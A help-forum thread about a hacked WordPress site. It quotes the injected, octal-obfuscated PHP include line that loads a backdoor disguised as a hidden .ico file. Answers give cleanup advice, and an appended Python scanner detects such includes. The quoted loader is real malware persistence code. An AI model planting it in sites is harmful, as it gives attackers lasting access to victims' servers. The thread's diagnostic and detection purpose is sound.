Reputation: 2947
It looks like my WordPress site has been hacked. The following code snippet was in index.php and wp-config.php:
<?php
/*6b9bb*/
@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
However, the code appeared again. What would be good solutions?
P.S. I am using SiteGround.
Thanks
Upvotes: 2
Views: 4120
Reputation:
I faced this problem too, and step by step I did the steps below:
Upvotes: 1
Reputation: 476
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:
Upvotes: 2
Reputation: 133
Yeah, someone is including a .ico file (open it with a text editor, and you will see it is some PHP code and not a real .ico file):
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in, they can set up all sorts of backdoors to keep access; any .php file of theirs can do this. At the moment, closing the initial front door they use is your sole occupation.
Follow the advice in this article: https://codex.wordpress.org/FAQ_My_site_was_hacked And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Upvotes: 8
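The injected line in the question hides its include target behind PHP octal escapes, and the target is a PHP file named like an icon. The following is an added example, not part of any answer above: a Python sketch that decodes such escapes and walks a site directory for both signs. The extension list and the function names are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# The injected line from the question, as a raw string so Python keeps the escapes.
SAMPLE = r'''@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";'''

# PHP double-quoted strings expand \NNN (octal) and \xHH (hex); the last
# alternative consumes any other escape (such as \\) so it is never misread.
ESCAPE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(.))', re.S)
# include/require with a double-quoted literal argument.
INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I | re.S)
# Extensions that should never hold PHP (assumption: extend to suit the site).
STATIC_EXT = {".ico", ".png", ".jpg", ".jpeg", ".gif"}

def decode_php_escapes(text):
    """Expand octal/hex escapes the way PHP does; leave other escapes as written."""
    def expand(m):
        if m.group(1):
            return chr(int(m.group(1), 8) & 0xFF)  # PHP wraps octal values above \377
        if m.group(2):
            return chr(int(m.group(2), 16))
        return m.group(0)
    return ESCAPE.sub(expand, text)

def obfuscated_includes(php_source):
    """Decoded targets of include/require calls whose path uses numeric escapes."""
    targets = []
    for m in INCLUDE.finditer(php_source):
        decoded = decode_php_escapes(m.group(1))
        if decoded != m.group(1):  # differs only when numeric escapes were present
            targets.append(decoded)
    return targets

def scan_tree(root):
    """Return (path, reason, detail) tuples for suspicious files under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):  # pathlib globbing includes dotfiles
        if not path.is_file():
            continue
        data = path.read_bytes()
        if path.suffix.lower() == ".php":
            for target in obfuscated_includes(data.decode("latin-1")):
                findings.append((str(path), "obfuscated include", target))
        elif path.suffix.lower() in STATIC_EXT and b"<?php" in data.lower():
            findings.append((str(path), "PHP code in static file", ""))
    return findings

if __name__ == "__main__":
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding, sep="\t")
```

A clean result only means these two patterns were not found; it does not show that the site is free of other backdoors.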